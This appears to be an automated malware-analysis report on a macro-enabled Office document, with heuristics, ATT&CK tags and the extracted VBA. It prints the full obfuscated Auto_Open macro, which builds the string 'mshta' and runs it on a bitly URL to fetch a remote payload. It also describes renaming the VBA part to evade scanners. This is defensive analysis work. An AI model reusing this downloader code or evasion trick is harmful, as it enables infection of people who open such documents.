MALICIOUS
68
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a macro-enabled Office document containing an Auto_Open VBA macro. This macro reconstructs the string "mshta" and uses the ShellExecute API to open the URL "http://www.bitly.com/hwdinnwshdwdwqwhda" with the mshta.exe interpreter, likely to download and execute a second-stage payload. The VBA project part was renamed to evade detection.
Heuristics 3
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/asjdajdoawdoajwd.bin)
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub _ Auto_Open _ ()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1082 bytes |
SHA-256: 817a9dbeaaa9364c93657dabbb744ed2aaffd1239c48dd68da7e4a5d2df47b0b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Const _
SW_SHOW _
= _
1
Const _
SW_SHOWMAXIMIZED _
= _
3
Public _
Declare _
Function _
ShellExecute _
Lib _
"Shell32.dll" _
Alias _
"ShellExecuteA" _
(ByVal _
hwnd _
As _
Long _
, _
ByVal _
lpOperation _
As _
String _
, _
ByVal lpFile As String _
, _
ByVal lpParameters As String _
, _
ByVal lpDirectory As String _
, _
ByVal nShowCmd As Long) As Long
Function koko()
koko _
= _
"m" _
+ _
"s" _
+ _
"h" _
+ _
"t" _
+ _
"a"
End _
Function
Sub _
Auto_Open _
()
Dim _
RetVal _
As _
Long
On _
Error _
Resume _
Next
RetVal _
= _
ShellExecute _
(0, "open", koko, "h" _
+ _
"t" _
+ _
"t" _
+ _
"p" _
+ _
":" _
+ _
"/" _
+ _
"/" _
+ _
"w" _
+ _
"w" _
+ "w" + "." + "b" + "i" + "t" + "l" + "y" + "." + "c" + "o" + "m/hwdinnwshdwdwqwhda", _
"%public%" _
, _
SW_SHOWMinimize)
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/asjdajdoawdoajwd.bin | 14336 bytes |
SHA-256: db1ca81719d617cc08b00e02cbfa5f5681ab2e2c6cb27765b86dbf9707e24e33 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.